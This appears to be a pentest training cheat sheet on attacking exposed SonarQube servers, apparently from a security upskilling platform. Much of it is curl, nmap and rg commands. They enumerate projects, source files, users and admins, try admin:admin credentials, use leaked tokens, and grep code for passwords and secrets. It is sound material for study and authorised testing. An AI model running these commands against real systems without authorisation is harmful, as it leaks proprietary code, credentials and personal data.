Want to Practice These Techniques?

Try Hackviser's interactive cyber security upskilling platform - Learn by doing!

SonarQube

Default Port: 9000

SonarQube is a source code quality and security analysis platform. In pentests, exposed SonarQube instances can reveal project names, vulnerable code paths, source snippets, developer users, CI tokens, webhooks, and repository integrations.

Connect

Using Web Browser

Check the UI for anonymous project visibility and authentication method.

http://target.com:9000
https://sonarqube.target.com
https://sonar.target.com

Using curl

Use API endpoints to fingerprint the instance and test anonymous access.

curl -I http://target.com:9000/
curl -s http://target.com:9000/api/system/status
curl -s http://target.com:9000/api/server/version

Using API Token

Leaked SonarQube tokens are commonly found in CI variables and scanner configs.

curl -u TOKEN: http://target.com:9000/api/authentication/validate
curl -u TOKEN: http://target.com:9000/api/projects/search
curl -u TOKEN: http://target.com:9000/api/users/current

Using sonar-scanner

Scanner configuration often exposes host URLs, project keys, and tokens.

sonar-scanner \
  -Dsonar.host.url=http://target.com:9000 \
  -Dsonar.projectKey=project-key \
  -Dsonar.login=TOKEN

Recon

Service Detection with Nmap

Scan the default port and common reverse proxy ports.

nmap -p 80,443,9000,9443 -sV target.com
nmap -p 80,443,9000 --script http-title,http-headers target.com
nmap -p 443,9443 --script ssl-cert,ssl-enum-ciphers target.com

Product Fingerprinting

Version and status endpoints help confirm SonarQube.

curl -s http://target.com:9000/api/system/status
curl -s http://target.com:9000/api/server/version
curl -s http://target.com:9000/api/webservices/list | head
httpx -u http://target.com:9000 -title -tech-detect -status-code

Authentication Review

Check anonymous session behavior before credential testing.

curl -I http://target.com:9000/sessions/new
curl -s http://target.com:9000/api/authentication/validate
curl -s http://target.com:9000/api/users/current

API Discovery

SonarQube exposes an API index when webservices are reachable.

curl -s http://target.com:9000/api/webservices/list | jq
curl -s http://target.com:9000/api/webservices/list | grep -i "projects\|issues\|components\|sources"

Enumeration

Project Enumeration

Anonymous project access is the highest-value first check.

curl -s http://target.com:9000/api/projects/search | jq
curl -s "http://target.com:9000/api/projects/search?q=api" | jq
curl -s "http://target.com:9000/api/components/search?qualifiers=TRK" | jq

Branch and Measure Enumeration

Branches and metrics reveal release flows and vulnerable project areas.

curl -s "http://target.com:9000/api/project_branches/list?project=project-key" | jq
curl -s "http://target.com:9000/api/project_tags/search?project=project-key" | jq
curl -s "http://target.com:9000/api/measures/component?component=project-key&metricKeys=vulnerabilities,bugs,code_smells,ncloc" | jq

Issue Enumeration

Issues may disclose vulnerable files, rule names, severities, and remediation notes.

curl -s "http://target.com:9000/api/issues/search?componentKeys=project-key&types=VULNERABILITY" | jq
curl -s "http://target.com:9000/api/issues/search?componentKeys=project-key&severities=CRITICAL,BLOCKER" | jq
curl -s "http://target.com:9000/api/hotspots/search?projectKey=project-key" | jq

Source Enumeration

Source endpoints may expose snippets or full files depending on permissions.

curl -s "http://target.com:9000/api/components/tree?component=project-key&qualifiers=FIL" | jq
curl -s "http://target.com:9000/api/sources/show?key=project-key:path/to/file.java" | jq
curl -i "http://target.com:9000/api/sources/raw?key=project-key:path/to/file.java"

User and Group Enumeration

User data helps identify developers, admins, and service accounts.

curl -s "http://target.com:9000/api/users/search" | jq
curl -s "http://target.com:9000/api/user_groups/search" | jq
curl -s "http://target.com:9000/api/permissions/users?permission=admin" | jq

Attack Vectors

Anonymous Project Access

Anonymous visibility can leak code intelligence without credentials.

curl -s http://target.com:9000/api/projects/search | jq
curl -s "http://target.com:9000/api/issues/search?types=VULNERABILITY" | jq
curl -i "http://target.com:9000/api/sources/show?key=project-key:path/to/file"

Default Credentials

Check weak local credentials only when in scope.

# Common legacy default:
# admin:admin
curl -u admin:admin http://target.com:9000/api/authentication/validate

Leaked Tokens

Tokens can provide project, issue, source, or admin access.

rg -n 'sonar.login|sonar.token|SONAR_TOKEN|sonar.host.url' .
curl -u TOKEN: http://target.com:9000/api/users/current
curl -u TOKEN: http://target.com:9000/api/projects/search

Source and Secret Exposure

Search accessible issues and source snippets for secrets.

curl -s "http://target.com:9000/api/issues/search?componentKeys=project-key" | grep -Ei 'password|secret|token|apikey'
curl -s "http://target.com:9000/api/sources/show?key=project-key:path/to/file" | grep -Ei 'password|secret|token|apikey'

Webhook and Integration Exposure

Administrative access may reveal CI/CD and repository integrations.

curl -u TOKEN: "http://target.com:9000/api/webhooks/list?project=project-key" | jq
curl -u TOKEN: "http://target.com:9000/api/settings/values?component=project-key" | jq

Post-Exploitation

Project Impact Review

Summarize visible projects, branches, issues, and source access.

curl -u TOKEN: http://target.com:9000/api/projects/search > sonarqube-projects.json
curl -u TOKEN: "http://target.com:9000/api/issues/search?types=VULNERABILITY" > sonarqube-vulnerabilities.json

CI/CD Pivot Review

Project names, scanner configs, and webhooks often point to build systems.

rg -n 'jenkins|gitlab|github|azure|bitbucket|nexus|artifactory|registry' sonarqube-*.json
curl -u TOKEN: "http://target.com:9000/api/webhooks/list" | jq

Account Review

Document users, groups, and admin permissions.

curl -u TOKEN: "http://target.com:9000/api/users/search" > sonarqube-users.json
curl -u TOKEN: "http://target.com:9000/api/user_groups/search" > sonarqube-groups.json
curl -u TOKEN: "http://target.com:9000/api/permissions/users?permission=admin" > sonarqube-admins.json

Useful Tools

Tool	Purpose
`curl`	API and auth testing
`jq`	JSON parsing
`httpx`	Web fingerprinting
`sonar-scanner`	Scanner config validation
`rg`	Token and config searching
`nmap`	Port and TLS checks

Security Misconfigurations

Misconfiguration	Risk
Anonymous project access	Project and issue disclosure
Source endpoints exposed	Code and secret leakage
Default or weak local credentials	Administrative access
Leaked scanner tokens	API access through CI secrets
Broad project permissions	Cross-team data exposure
Webhooks visible to low-privilege users	CI/CD integration leakage
Outdated SonarQube	Known vulnerability exposure

Want to Practice These Techniques?

SonarQube

Connect​

Using Web Browser​

Using curl​

Using API Token​

Using sonar-scanner​

Recon​

Service Detection with Nmap​

Product Fingerprinting​

Authentication Review​

API Discovery​

Enumeration​

Project Enumeration​

Branch and Measure Enumeration​

Issue Enumeration​

Source Enumeration​

User and Group Enumeration​

Attack Vectors​

Anonymous Project Access​

Default Credentials​

Leaked Tokens​

Source and Secret Exposure​

Webhook and Integration Exposure​

Post-Exploitation​

Project Impact Review​

CI/CD Pivot Review​

Account Review​

Useful Tools​

Security Misconfigurations​